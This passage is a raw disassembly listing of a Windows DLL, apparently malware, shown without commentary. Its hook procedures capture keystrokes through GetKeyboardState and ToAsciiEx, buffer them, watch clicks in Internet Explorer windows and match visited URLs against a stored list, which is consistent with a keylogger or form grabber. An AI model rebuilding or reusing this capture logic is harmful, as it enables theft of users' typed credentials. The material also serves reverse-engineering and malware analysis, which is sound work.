lea eax, [ebp+Point]
push eax ; lpPoint
call ds:GetCursorPos ; GetCursorPos
lea ecx, [ebp+Point]
push ecx ; lpPoint
mov edx, hWnd
push edx ; hWnd
call ds:ScreenToClient ; ScreenToClient
mov eax, [ebp+Point.x]
cmp eax, [ebp+var_138]
jl short loc_100044C6
mov ecx, [ebp+Point.x]
cmp ecx, [ebp+var_130]
jg short loc_100044C6
mov edx, [ebp+Point.y]
cmp edx, [ebp+var_134]
jl short loc_100044C6
mov eax, [ebp+Point.y]
cmp eax, [ebp+var_12C]
jg short loc_100044C6
mov dword_10073978, 1
loc_100044C6: ; CODE XREF: sub_10003786+C3B�j
; sub_10003786+D0A�j ...
lea ecx, [ebp+var_F8]
push ecx
lea edx, [ebp+var_220]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_2A0], eax
mov eax, [ebp+var_2A0]
mov [ebp+var_2A4], eax
mov byte ptr [ebp+var_4], 17h
mov ecx, [ebp+var_2A4]
call sub_1000D6C0
and eax, 0FFh
test eax, eax
jz short loc_1000456D
lea ecx, [ebp+var_FC]
push ecx
lea edx, [ebp+var_228]
push edx
lea ecx, [ebp+var_F4]
call sub_1000E130
mov ecx, eax
call sub_1000DF10
mov [ebp+var_2A8], eax
mov ecx, [ebp+var_2A8]
call sub_1000D6C0
mov byte ptr [ebp+var_224], al
lea ecx, [ebp+var_228]
call sub_1000D620
mov eax, [ebp+var_224]
and eax, 0FFh
test eax, eax
jz short loc_1000456D
mov [ebp+var_2AC], 1
jmp short loc_10004577
; ---------------------------------------------------------------------------
loc_1000456D: ; CODE XREF: sub_10003786+D88�j
; sub_10003786+DD9�j
mov [ebp+var_2AC], 0
loc_10004577: ; CODE XREF: sub_10003786+DE5�j
mov cl, byte ptr [ebp+var_2AC]
mov byte ptr [ebp+var_21C], cl
mov byte ptr [ebp+var_4], 14h
lea ecx, [ebp+var_220]
call sub_1000D620
mov edx, [ebp+var_21C]
and edx, 0FFh
test edx, edx
jz loc_100047EF
push offset asc_100228EC ; "="
push offset String1 ; lpString1
call ds:lstrcatA ; lstrcatA
lea ecx, [ebp+var_11C]
call sub_1000D670
push eax ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jz short loc_100045FC
lea ecx, [ebp+var_11C]
call sub_1000D670
push eax ; lpString
call ds:lstrlenA ; lstrlenA
cmp eax, 0FFh
jge short loc_100045FC
lea ecx, [ebp+var_11C]
call sub_1000D670
push eax ; lpString2
push offset String1 ; lpString1
call ds:lstrcatA ; lstrcatA
loc_100045FC: ; CODE XREF: sub_10003786+E44�j
; sub_10003786+E5D�j
mov [ebp+var_50], 0
jmp short loc_1000460E
; ---------------------------------------------------------------------------
loc_10004605: ; CODE XREF: sub_10003786:loc_100047DA�j
mov eax, [ebp+var_50]
add eax, 1
mov [ebp+var_50], eax
loc_1000460E: ; CODE XREF: sub_10003786+E7D�j
mov ecx, [ebp+var_50]
cmp ecx, [ebp+var_84]
jge loc_100047DF
lea ecx, [ebp+var_120]
call sub_1000D670
push eax ; lpString2
mov edx, [ebp+var_50]
mov eax, [ebp+edx*4+lpString1]
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz loc_100047DA
mov ecx, [ebp+var_50]
cmp [ebp+ecx*4+Str], 0
jz short loc_10004690
mov edx, [ebp+var_50]
mov eax, [ebp+edx*4+Str]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jz short loc_10004690
lea ecx, [ebp+var_11C]
call sub_1000D670
push eax ; lpString
call ds:lstrlenA ; lstrlenA
mov esi, eax
mov ecx, [ebp+var_50]
mov edx, [ebp+ecx*4+Str]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
cmp esi, eax
jge short loc_1000468E
mov dword_10073974, 1
loc_1000468E: ; CODE XREF: sub_10003786+EFC�j
jmp short loc_100046B0
; ---------------------------------------------------------------------------
loc_10004690: ; CODE XREF: sub_10003786+EC1�j
; sub_10003786+ED3�j
lea ecx, [ebp+var_11C]
call sub_1000D670
push eax ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jg short loc_100046B0
mov dword_10073974, 1
loc_100046B0: ; CODE XREF: sub_10003786:loc_1000468E�j
; sub_10003786+F1E�j
mov eax, [ebp+var_50]
cmp [ebp+eax*4+lpString], 0
jz loc_100047DA
mov ecx, [ebp+var_50]
mov edx, [ebp+ecx*4+lpString]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jz loc_100047DA
push offset asc_100228F0 ; "l"
mov eax, [ebp+var_50]
mov ecx, [ebp+eax*4+lpString]
push ecx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_1000475A
mov [ebp+var_144], 0
jmp short loc_1000470F
; ---------------------------------------------------------------------------
loc_10004700: ; CODE XREF: sub_10003786:loc_10004758�j
mov edx, [ebp+var_144]
add edx, 1
mov [ebp+var_144], edx
loc_1000470F: ; CODE XREF: sub_10003786+F78�j
lea ecx, [ebp+var_11C]
call sub_1000D670
push eax ; lpString
call ds:lstrlenA ; lstrlenA
cmp [ebp+var_144], eax
jge short loc_1000475A
lea ecx, [ebp+var_11C]
call sub_1000D670
mov ecx, [ebp+var_144]
movsx edx, byte ptr [eax+ecx]
push edx ; C
call ds:isalpha ; isalpha
add esp, 4
test eax, eax
jnz short loc_10004758
mov dword_10073974, 1
jmp short loc_1000475A
; ---------------------------------------------------------------------------
loc_10004758: ; CODE XREF: sub_10003786+FC4�j
jmp short loc_10004700
; ---------------------------------------------------------------------------
loc_1000475A: ; CODE XREF: sub_10003786+F6C�j
; sub_10003786+FA1�j ...
push offset aD ; "d"
mov eax, [ebp+var_50]
mov ecx, [ebp+eax*4+lpString]
push ecx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_100047DA
mov [ebp+var_148], 0
jmp short loc_1000478F
; ---------------------------------------------------------------------------
loc_10004780: ; CODE XREF: sub_10003786:loc_100047D8�j
mov edx, [ebp+var_148]
add edx, 1
mov [ebp+var_148], edx
loc_1000478F: ; CODE XREF: sub_10003786+FF8�j
lea ecx, [ebp+var_11C]
call sub_1000D670
push eax ; lpString
call ds:lstrlenA ; lstrlenA
cmp [ebp+var_148], eax
jge short loc_100047DA
lea ecx, [ebp+var_11C]
call sub_1000D670
mov ecx, [ebp+var_148]
movsx edx, byte ptr [eax+ecx]
push edx ; C
call ds:isdigit ; isdigit
add esp, 4
test eax, eax
jnz short loc_100047D8
mov dword_10073974, 1
jmp short loc_100047DA
; ---------------------------------------------------------------------------
loc_100047D8: ; CODE XREF: sub_10003786+1044�j
jmp short loc_10004780
; ---------------------------------------------------------------------------
loc_100047DA: ; CODE XREF: sub_10003786+EB3�j
; sub_10003786+F35�j ...
jmp loc_10004605
; ---------------------------------------------------------------------------
loc_100047DF: ; CODE XREF: sub_10003786+E91�j
push offset asc_100228F8 ; "\r\n"
push offset String1 ; lpString1
call ds:lstrcatA ; lstrcatA
loc_100047EF: ; CODE XREF: sub_10003786+E1A�j
lea ecx, [ebp+var_118]
call sub_1000E130
mov [ebp+var_2B0], eax
mov eax, [ebp+var_2B0]
mov ecx, [eax]
mov edx, [ebp+var_2B0]
push edx
call dword ptr [ecx+8]
push 0
lea ecx, [ebp+var_118]
call sub_1000E210
mov byte ptr [ebp+var_4], 13h
lea ecx, [ebp+var_124]
call sub_1000D620
mov byte ptr [ebp+var_4], 12h
lea ecx, [ebp+var_128]
call sub_1000D620
mov byte ptr [ebp+var_4], 11h
lea ecx, [ebp+var_120]
call sub_1000D620
mov byte ptr [ebp+var_4], 10h
lea ecx, [ebp+var_11C]
call sub_1000D620
mov byte ptr [ebp+var_4], 0Fh
lea ecx, [ebp+var_114]
call sub_1000E1D0
mov byte ptr [ebp+var_4], 0Dh
lea ecx, [ebp+var_118]
call sub_1000E1D0
loc_10004879: ; CODE XREF: sub_10003786+6BE�j
mov eax, [ebp+var_110]
mov ecx, [eax]
mov edx, [ebp+var_110]
push edx
call dword ptr [ecx+8]
mov [ebp+var_110], 0
mov byte ptr [ebp+var_4], 0Ch
lea ecx, [ebp+var_F8]
call sub_1000D620
mov byte ptr [ebp+var_4], 0Bh
lea ecx, [ebp+var_104]
call sub_1000D620
mov byte ptr [ebp+var_4], 0Ah
lea ecx, [ebp+var_FC]
call sub_1000D620
mov byte ptr [ebp+var_4], 9
lea ecx, [ebp+var_108]
call sub_1000D620
mov byte ptr [ebp+var_4], 8
lea ecx, [ebp+var_F0]
call sub_1000D620
mov byte ptr [ebp+var_4], 7
lea ecx, [ebp+var_10C]
call sub_1000D620
mov byte ptr [ebp+var_4], 6
lea ecx, [ebp+var_F4]
call sub_1000E1D0
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_100]
call sub_1000E1D0
jmp loc_100039A3
; ---------------------------------------------------------------------------
loc_10004912: ; CODE XREF: sub_10003786+22C�j
mov eax, [ebp+var_10]
mov ecx, [eax]
mov edx, [ebp+var_10]
push edx
call dword ptr [ecx+8]
mov [ebp+var_10], 0
mov [ebp+var_22C], 1
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_14]
call sub_1000D620
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_18]
call sub_1000D620
mov eax, [ebp+var_22C]
loc_10004950: ; CODE XREF: sub_10003786+51�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_10003786 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; LRESULT __stdcall sub_10004960(int, WPARAM, LPARAM)
sub_10004960 proc near ; DATA XREF: sub_1000C9DC+167�o
var_110 = dword ptr -110h
String1 = byte ptr -10Ch
Point = tagPOINT ptr -0Ch
var_4 = dword ptr -4
nCode = dword ptr 8
wParam = dword ptr 0Ch
lParam = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 110h
mov eax, [ebp+lParam]
mov [ebp+var_4], eax
cmp dword_1006A90C, 0
jz loc_10004A5C
cmp [ebp+nCode], 0
jl loc_10004A42
mov ecx, [ebp+wParam]
mov [ebp+var_110], ecx
cmp [ebp+var_110], 202h
jz short loc_100049A0
jmp loc_10004A42
; ---------------------------------------------------------------------------
loc_100049A0: ; CODE XREF: sub_10004960+39�j
lea edx, [ebp+Point]
push edx ; lpPoint
call ds:GetCursorPos ; GetCursorPos
push 0FFh ; nMaxCount
lea eax, [ebp+String1]
push eax ; lpClassName
mov ecx, [ebp+Point.y]
push ecx
mov edx, [ebp+Point.x]
push edx ; Point
call ds:WindowFromPoint ; WindowFromPoint
push eax ; hWnd
call ds:GetClassNameA ; GetClassNameA
push offset aInternetExpl_0 ; "Internet Explorer_Server"
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_10004A15
mov ecx, dword_1002C210
push ecx ; int
mov edx, [ebp+Point.y]
push edx
mov eax, [ebp+Point.x]
push eax ; Point
call ds:WindowFromPoint ; WindowFromPoint
push eax ; hWnd
call sub_10003460
call sub_10003605
mov ecx, [ebp+Point.y]
push ecx
mov edx, [ebp+Point.x]
push edx ; Point
call ds:WindowFromPoint ; WindowFromPoint
push eax
call sub_100034DC
loc_10004A15: ; CODE XREF: sub_10004960+7F�j
cmp dword_10073978, 0
jz short loc_10004A42
cmp dword_10073974, 0
jz short loc_10004A42
mov dword_10073978, 0
mov dword_10073974, 0
mov eax, 1
jmp short loc_10004A5E
; ---------------------------------------------------------------------------
loc_10004A42: ; CODE XREF: sub_10004960+20�j
; sub_10004960+3B�j ...
mov eax, [ebp+lParam]
push eax ; lParam
mov ecx, [ebp+wParam]
push ecx ; wParam
mov edx, [ebp+nCode]
push edx ; nCode
mov eax, dword_1006A90C
push eax ; hhk
call ds:CallNextHookEx ; CallNextHookEx
jmp short loc_10004A5E
; ---------------------------------------------------------------------------
loc_10004A5C: ; CODE XREF: sub_10004960+16�j
xor eax, eax
loc_10004A5E: ; CODE XREF: sub_10004960+E0�j
; sub_10004960+FA�j
mov esp, ebp
pop ebp
retn 0Ch
sub_10004960 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 22Ch
mov eax, [ebp+10h]
mov [ebp-114h], eax
mov byte ptr [ebp-128h], 0
xor ecx, ecx
mov [ebp-127h], ecx
mov [ebp-123h], ecx
mov [ebp-11Fh], cl
mov dword ptr [ebp-10Ch], 0
mov dword ptr [ebp-11Ch], 0
cmp dword_1006A914, 0
jz loc_10004D49
call ds:GetForegroundWindow ; GetForegroundWindow
cmp dword_1006A96C, eax
jnz loc_10004D49
cmp dword ptr [ebp+8], 0
jl loc_10004D49
cmp dword ptr [ebp+0Ch], 100h
jnz loc_10004D49
cmp dword_1006A96C, 0
jz loc_10004D49
push 1
push 0
mov edx, dword_1006A96C
push edx
call ds:GetWindowThreadProcessId ; GetWindowThreadProcessId
push eax
call ds:GetCurrentThreadId ; GetCurrentThreadId
push eax
call ds:AttachThreadInput ; AttachThreadInput
lea eax, [ebp-108h]
push eax
call ds:GetKeyboardState ; GetKeyboardState
push 0
call ds:GetForegroundWindow ; GetForegroundWindow
push eax
call ds:GetWindowThreadProcessId ; GetWindowThreadProcessId
push eax
call ds:GetKeyboardLayout ; GetKeyboardLayout
push eax
mov ecx, [ebp-114h]
mov edx, [ecx+8]
push edx
lea eax, [ebp-128h]
push eax
lea ecx, [ebp-108h]
push ecx
mov edx, [ebp-114h]
mov eax, [edx+4]
push eax
mov ecx, [ebp-114h]
mov edx, [ecx]
push edx
call ds:ToAsciiEx ; ToAsciiEx
test eax, eax
jnz short loc_10004B7A
mov eax, [ebp-114h]
cmp dword ptr [eax], 8
jz short loc_10004B7A
mov ecx, [ebp-114h]
cmp dword ptr [ecx], 2Eh
jnz loc_10004D18
loc_10004B7A: ; CODE XREF: .text:10004B5E�j
; .text:10004B69�j
mov edx, [ebp-114h]
mov eax, [edx]
mov [ebp-22Ch], eax
mov ecx, [ebp-22Ch]
sub ecx, 8
mov [ebp-22Ch], ecx
cmp dword ptr [ebp-22Ch], 26h
ja loc_10004D18
mov eax, [ebp-22Ch]
xor edx, edx
mov dl, ds:byte_10004D83[eax]
jmp ds:off_10004D67[edx*4]
loc_10004BB9: ; DATA XREF: .text:10004D6F�o
mov ecx, off_1002210C
push ecx
lea edx, [ebp-128h]
push edx
call ds:lstrcpyA ; lstrcpyA
push 0
call ds:GetSystemMetrics ; GetSystemMetrics
cdq
sub eax, edx
sar eax, 1
mov [ebp-8], eax
push 1
call ds:GetSystemMetrics ; GetSystemMetrics
mov [ebp-110h], eax
mov dword ptr [ebp-118h], 0
jmp short loc_10004C06
; ---------------------------------------------------------------------------
loc_10004BF7: ; CODE XREF: .text:loc_10004C8A�j
mov eax, [ebp-118h]
add eax, 2
mov [ebp-118h], eax
loc_10004C06: ; CODE XREF: .text:10004BF5�j
mov ecx, [ebp-118h]
cmp ecx, [ebp-110h]
jge short loc_10004C8F
mov edx, [ebp-118h]
mov [ebp-4], edx
push 0FFh
lea eax, [ebp-228h]
push eax
mov ecx, [ebp-4]
push ecx
mov edx, [ebp-8]
push edx
call ds:WindowFromPoint ; WindowFromPoint
push eax
call ds:GetClassNameA ; GetClassNameA
push offset aInternetExpl_1 ; "Internet Explorer_Server"
lea eax, [ebp-228h]
push eax
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jnz short loc_10004C8A
mov ecx, dword_1002C210
push ecx
mov edx, [ebp-4]
push edx
mov eax, [ebp-8]
push eax
call ds:WindowFromPoint ; WindowFromPoint
push eax
call sub_10003460
call sub_10003605
mov ecx, [ebp-4]
push ecx
mov edx, [ebp-8]
push edx
call ds:WindowFromPoint ; WindowFromPoint
push eax
call sub_100034DC
jmp short loc_10004C8F
; ---------------------------------------------------------------------------
loc_10004C8A: ; CODE XREF: .text:10004C52�j
jmp loc_10004BF7
; ---------------------------------------------------------------------------
loc_10004C8F: ; CODE XREF: .text:10004C12�j
; .text:10004C88�j
cmp dword_10073974, 0
jz short loc_10004CAC
mov dword_10073974, 0
mov eax, 1
jmp loc_10004D61
; ---------------------------------------------------------------------------
loc_10004CAC: ; CODE XREF: .text:10004C96�j
jmp short loc_10004D18
; ---------------------------------------------------------------------------
loc_10004CAE: ; CODE XREF: .text:10004BB2�j
; DATA XREF: .text:10004D6B�o
mov eax, lpString2
push eax
lea ecx, [ebp-128h]
push ecx
call ds:lstrcpyA ; lstrcpyA
jmp short loc_10004D18
; ---------------------------------------------------------------------------
loc_10004CC3: ; CODE XREF: .text:10004BB2�j
; DATA XREF: .text:off_10004D67�o
mov edx, off_100220F8
push edx
lea eax, [ebp-128h]
push eax
call ds:lstrcpyA ; lstrcpyA
jmp short loc_10004D18
; ---------------------------------------------------------------------------
loc_10004CD9: ; CODE XREF: .text:10004BB2�j
; DATA XREF: .text:10004D7B�o
mov ecx, off_100220FC
push ecx
lea edx, [ebp-128h]
push edx
call ds:lstrcpyA ; lstrcpyA
jmp short loc_10004D18
; ---------------------------------------------------------------------------
loc_10004CEF: ; CODE XREF: .text:10004BB2�j
; DATA XREF: .text:10004D77�o
mov eax, off_10022100
push eax
lea ecx, [ebp-128h]
push ecx
call ds:lstrcpyA ; lstrcpyA
jmp short loc_10004D18
; ---------------------------------------------------------------------------
loc_10004D04: ; CODE XREF: .text:10004BB2�j
; DATA XREF: .text:10004D73�o
mov edx, off_10022104
push edx
lea eax, [ebp-128h]
push eax
call ds:lstrcpyA ; lstrcpyA
loc_10004D18: ; CODE XREF: .text:10004B74�j
; .text:10004B9E�j ...
push 0
push 0
mov ecx, dword_1006A96C
push ecx
call ds:GetWindowThreadProcessId ; GetWindowThreadProcessId
push eax
call ds:GetCurrentThreadId ; GetCurrentThreadId
push eax
call ds:AttachThreadInput ; AttachThreadInput
lea edx, [ebp-128h]
push edx
push offset dword_10072974
call ds:lstrcatA ; lstrcatA
loc_10004D49: ; CODE XREF: .text:10004AAC�j
; .text:10004ABE�j ...
mov eax, [ebp+10h]
push eax
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp+8]
push edx
mov eax, dword_1006A910
push eax
call ds:CallNextHookEx ; CallNextHookEx
loc_10004D61: ; CODE XREF: .text:10004CA7�j
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
off_10004D67 dd offset loc_10004CC3 ; DATA XREF: .text:10004BB2�r
dd offset loc_10004CAE
dd offset loc_10004BB9
dd offset loc_10004D04
dd offset loc_10004CEF
dd offset loc_10004CD9
dd offset loc_10004D18
byte_10004D83 db 0 ; DATA XREF: .text:10004BAC�r
dd 6060601h, 6060602h, 2 dup(6060606h), 6030606h, 4060606h
dd 3 dup(6060606h)
db 6, 5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; LRESULT __stdcall sub_10004DAA(int, WPARAM, LPARAM)
sub_10004DAA proc near ; DATA XREF: sub_1000537C+1AC�o
var_128 = dword ptr -128h
cchWideChar = dword ptr -124h
lpchText = dword ptr -120h
var_11C = dword ptr -11Ch
String1 = word ptr -118h
var_113 = dword ptr -113h
var_10F = byte ptr -10Fh
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
KeyState = byte ptr -100h
nCode = dword ptr 8
wParam = dword ptr 0Ch
lParam = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 128h
mov eax, [ebp+lParam]
mov [ebp+var_108], eax
mov byte ptr [ebp+String1], 0
xor ecx, ecx
mov dword ptr [ebp+String1+1], ecx
mov [ebp+var_113], ecx
mov [ebp+var_10F], cl
mov [ebp+var_104], 0
mov [ebp+var_10C], 0
mov [ebp+var_11C], 1
cmp dword_1006A910, 0
jz loc_1000507B
cmp [ebp+nCode], 0
jl loc_1000507B
cmp [ebp+wParam], 100h
jnz loc_1000507B
mov edx, dword_1006A920
push edx ; h
mov eax, hdc
push eax ; hdc
call ds:SelectObject ; SelectObject
push 1 ; fAttach
push 0 ; lpdwProcessId
call ds:GetForegroundWindow ; GetForegroundWindow
push eax ; hWnd
call ds:GetWindowThreadProcessId ; GetWindowThreadProcessId
push eax ; idAttachTo
call ds:GetCurrentThreadId ; GetCurrentThreadId
push eax ; idAttach
call ds:AttachThreadInput ; AttachThreadInput
lea ecx, [ebp+KeyState]
push ecx ; lpKeyState
call ds:GetKeyboardState ; GetKeyboardState
push 0 ; lpdwProcessId
call ds:GetForegroundWindow ; GetForegroundWindow
push eax ; hWnd
call ds:GetWindowThreadProcessId ; GetWindowThreadProcessId
push eax ; idThread
call ds:GetKeyboardLayout ; GetKeyboardLayout
push eax ; dwhkl
mov edx, [ebp+var_108]
mov eax, [edx+8]
push eax ; uFlags
lea ecx, [ebp+String1]
push ecx ; lpChar
lea edx, [ebp+KeyState]
push edx ; lpKeyState
mov eax, [ebp+var_108]
mov ecx, [eax+4]
push ecx ; uScanCode
mov edx, [ebp+var_108]
mov eax, [edx]
push eax ; uVirtKey
call ds:ToAsciiEx ; ToAsciiEx
test eax, eax
jnz short loc_10004EBE
mov ecx, [ebp+var_108]
cmp dword ptr [ecx], 8
jz short loc_10004EBE
mov edx, [ebp+var_108]
cmp dword ptr [edx], 2Eh
jnz loc_1000505C
loc_10004EBE: ; CODE XREF: sub_10004DAA+F8�j
; sub_10004DAA+103�j
mov eax, [ebp+var_108]
mov ecx, [eax]
mov [ebp+var_128], ecx
mov edx, [ebp+var_128]
sub edx, 8
mov [ebp+var_128], edx
cmp [ebp+var_128], 26h
ja loc_10004F9A
mov ecx, [ebp+var_128]
xor eax, eax
mov al, ds:byte_100050B2[ecx]
jmp ds:off_1000509A[eax*4]
loc_10004EFD: ; DATA XREF: .text:1000509E�o
mov edx, lpString2
push edx ; lpString2
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov [ebp+var_11C], 2
jmp short loc_10004F9A
; ---------------------------------------------------------------------------
loc_10004F1D: ; CODE XREF: sub_10004DAA+14C�j
; DATA XREF: .text:off_1000509A�o
mov ecx, off_100220F8
push ecx ; lpString2
lea edx, [ebp+String1]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov [ebp+var_11C], 2
jmp short loc_10004F9A
; ---------------------------------------------------------------------------
loc_10004F3D: ; CODE XREF: sub_10004DAA+14C�j
; DATA XREF: .text:100050AA�o
mov eax, off_100220FC
push eax ; lpString2
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov [ebp+var_11C], 2
jmp short loc_10004F9A
; ---------------------------------------------------------------------------
loc_10004F5C: ; CODE XREF: sub_10004DAA+14C�j
; DATA XREF: .text:100050A6�o
mov edx, off_10022100
push edx ; lpString2
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov [ebp+var_11C], 2
jmp short loc_10004F9A
; ---------------------------------------------------------------------------
loc_10004F7C: ; CODE XREF: sub_10004DAA+14C�j
; DATA XREF: .text:100050A2�o
mov ecx, off_10022104
push ecx ; lpString2
lea edx, [ebp+String1]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov [ebp+var_11C], 2
loc_10004F9A: ; CODE XREF: sub_10004DAA+138�j
; sub_10004DAA+14C�j ...
mov eax, dword_100281F8
mov rc.left, eax
mov ecx, dword_100281FC
mov rc.top, ecx
mov edx, [ebp+var_11C]
imul edx, 0Fh
mov eax, rc.left
add eax, edx
mov rc.right, eax
mov ecx, rc.top
add ecx, 12h
mov rc.bottom, ecx
push 0 ; cchWideChar
push 0 ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
lea edx, [ebp+String1]
push edx ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+cchWideChar], eax
mov eax, [ebp+cchWideChar]
push eax ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpchText], eax
mov ecx, [ebp+cchWideChar]
push ecx ; cchWideChar
mov edx, [ebp+lpchText]
push edx ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
lea eax, [ebp+String1]
push eax ; lpMultiByteStr
push 0 ; dwFlags
push 0 ; CodePage
call ds:MultiByteToWideChar ; MultiByteToWideChar
push 1 ; format
push offset rc ; lprc
push 0FFFFFFFFh ; cchText
mov ecx, [ebp+lpchText]
push ecx ; lpchText
mov edx, hdc
push edx ; hdc
call ds:DrawTextW ; DrawTextW
mov eax, [ebp+var_11C]
imul eax, 0Fh
mov ecx, dword_100281F8
add ecx, eax
mov dword_100281F8, ecx
loc_1000505C: ; CODE XREF: sub_10004DAA+10E�j
push 0 ; fAttach
push 0 ; lpdwProcessId
call ds:GetForegroundWindow ; GetForegroundWindow
push eax ; hWnd
call ds:GetWindowThreadProcessId ; GetWindowThreadProcessId
push eax ; idAttachTo
call ds:GetCurrentThreadId ; GetCurrentThreadId
push eax ; idAttach
call ds:AttachThreadInput ; AttachThreadInput
loc_1000507B: ; CODE XREF: sub_10004DAA+52�j
; sub_10004DAA+5C�j ...
mov edx, [ebp+lParam]
push edx ; lParam
mov eax, [ebp+wParam]
push eax ; wParam
mov ecx, [ebp+nCode]
push ecx ; nCode
mov edx, dword_1006A910
push edx ; hhk
call ds:CallNextHookEx ; CallNextHookEx
mov esp, ebp
pop ebp
retn 0Ch
sub_10004DAA endp
; ---------------------------------------------------------------------------
off_1000509A dd offset loc_10004F1D ; DATA XREF: sub_10004DAA+14C�r
dd offset loc_10004EFD
dd offset loc_10004F7C
dd offset loc_10004F5C
dd offset loc_10004F3D
dd offset loc_10004F9A
byte_100050B2 db 0 ; DATA XREF: sub_10004DAA+146�r
db 1
dd 4 dup(5050505h), 5050205h, 5030505h, 3 dup(5050505h)
db 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; LRESULT __stdcall sub_100050D9(int, WPARAM, LPARAM)
sub_100050D9 proc near ; DATA XREF: sub_1000537C+169�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
chText = byte ptr -1Ch
rc = tagRECT ptr -10h
nCode = dword ptr 8
wParam = dword ptr 0Ch
lParam = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov [ebp+var_24], 0
mov eax, [ebp+lParam]
mov [ebp+var_20], eax
cmp hhk, 0
jz loc_10005374
cmp [ebp+nCode], 0
jl loc_10005359
mov ecx, [ebp+wParam]
mov [ebp+var_28], ecx
cmp [ebp+var_28], 201h
jz short loc_10005124
cmp [ebp+var_28], 202h
jz loc_10005211
jmp loc_10005359
; ---------------------------------------------------------------------------
loc_10005124: ; CODE XREF: sub_100050D9+37�j
; sub_100050D9+12E�j
mov edx, [ebp+var_24]
cmp dword_10043770[edx*4], 0
jz loc_1000520C
cmp [ebp+var_24], 1000h
jge loc_1000520C
mov eax, [ebp+var_24]
mov ecx, dword_10043770[eax*4]
mov edx, [ecx]
push edx ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; SubStr
push offset byte_1006A6F4 ; Str
call ds:_strlwr ; _strlwr
add esp, 4
push eax ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz loc_100051FE
mov dword_1006A900, 1
mov eax, hHandle
push eax ; hEvent
call ds:ResetEvent ; ResetEvent
mov dword_10037124, 1
push offset aHttp ; "http://"
push offset byte_1006A6F4 ; Str
call ds:strstr ; strstr
add esp, 8
test eax, eax
jz short loc_100051D4
push offset asc_1002293C ; "://"
push offset byte_1006A6F4 ; Str
call ds:strstr ; strstr
add esp, 8
add eax, 3
push eax ; lpString2
push offset Str ; lpString1
call ds:lstrcpyA ; lstrcpyA
jmp short loc_100051E4
; ---------------------------------------------------------------------------
loc_100051D4: ; CODE XREF: sub_100050D9+D5�j
push offset byte_1006A6F4 ; lpString2
push offset Str ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_100051E4: ; CODE XREF: sub_100050D9+F9�j
push 0 ; lpThreadId
push 0 ; dwCreationFlags
push offset dword_10034230 ; lpParameter
push offset sub_1000537C ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
jmp short loc_1000520C
; ---------------------------------------------------------------------------
loc_100051FE: ; CODE XREF: sub_100050D9+9A�j
mov ecx, [ebp+var_24]
add ecx, 1
mov [ebp+var_24], ecx
jmp loc_10005124
; ---------------------------------------------------------------------------
loc_1000520C: ; CODE XREF: sub_100050D9+56�j
; sub_100050D9+63�j ...
jmp loc_10005359
; ---------------------------------------------------------------------------
loc_10005211: ; CODE XREF: sub_100050D9+40�j
mov edx, dword_1006A904
add edx, 1
mov dword_1006A904, edx
mov eax, dword_1006A920
push eax ; h
mov ecx, hdc
push ecx ; hdc
call ds:SelectObject ; SelectObject
cmp dword_10037124, 0
jz short loc_1000528F
mov edx, [ebp+var_20]
mov eax, [edx]
sub eax, 32h
test eax, eax
jle short loc_10005255
mov ecx, [ebp+var_20]
mov edx, [ecx]
sub edx, 32h
mov [ebp+var_2C], edx
jmp short loc_1000525C
; ---------------------------------------------------------------------------
loc_10005255: ; CODE XREF: sub_100050D9+16D�j
mov [ebp+var_2C], 0
loc_1000525C: ; CODE XREF: sub_100050D9+17A�j
mov eax, [ebp+var_2C]
mov dword_10030218, eax
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
sub edx, 32h
test edx, edx
jle short loc_1000527F
mov eax, [ebp+var_20]
mov ecx, [eax+4]
sub ecx, 32h
mov [ebp+var_30], ecx
jmp short loc_10005286
; ---------------------------------------------------------------------------
loc_1000527F: ; CODE XREF: sub_100050D9+196�j
mov [ebp+var_30], 0
